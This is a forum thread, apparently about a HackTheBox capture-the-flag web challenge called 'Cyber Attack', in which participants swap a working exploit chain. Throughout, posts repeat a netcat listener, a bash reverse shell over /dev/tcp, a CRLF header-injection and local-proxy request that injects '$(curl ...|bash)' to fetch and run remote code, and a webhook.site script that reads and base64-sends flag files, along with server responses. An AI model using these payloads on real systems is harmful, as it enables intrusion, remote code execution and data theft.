Posts: 13
Threads: 0
Joined: Nov 2024
(03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
I found an XSS but I'm not sure if it's the objective :/
Posts: 4
Threads: 0
Joined: Mar 2025
(03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
I have been stuck for a day now... I'm still an amateur but I'd appreciate any hint 
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 11:56 AM)0x02b375 Wrote: This is it,thank you king!
Can you send me the request you used on burpsuite. I tried but seems not to fetch the index file for some reason even though it shows something was fetched on the server
Posts: 70
Threads: 7
Joined: Jul 2024
curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: (03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: (03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
Makes total sense. Thanks!
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: (03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: (03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
One last question. Can someone use the hackthebox vpn and serve the file from there
Posts: 13
Threads: 0
Joined: Nov 2024
(03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: (03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: (03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
Posts: 14
Threads: 0
Joined: Feb 2025
03-23-2025, 03:09 PM
(This post was last modified: 03-23-2025, 03:10 PM by oyfyic.)
(03-23-2025, 02:24 PM)0xhdfg Wrote: (03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: (03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: (03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
|
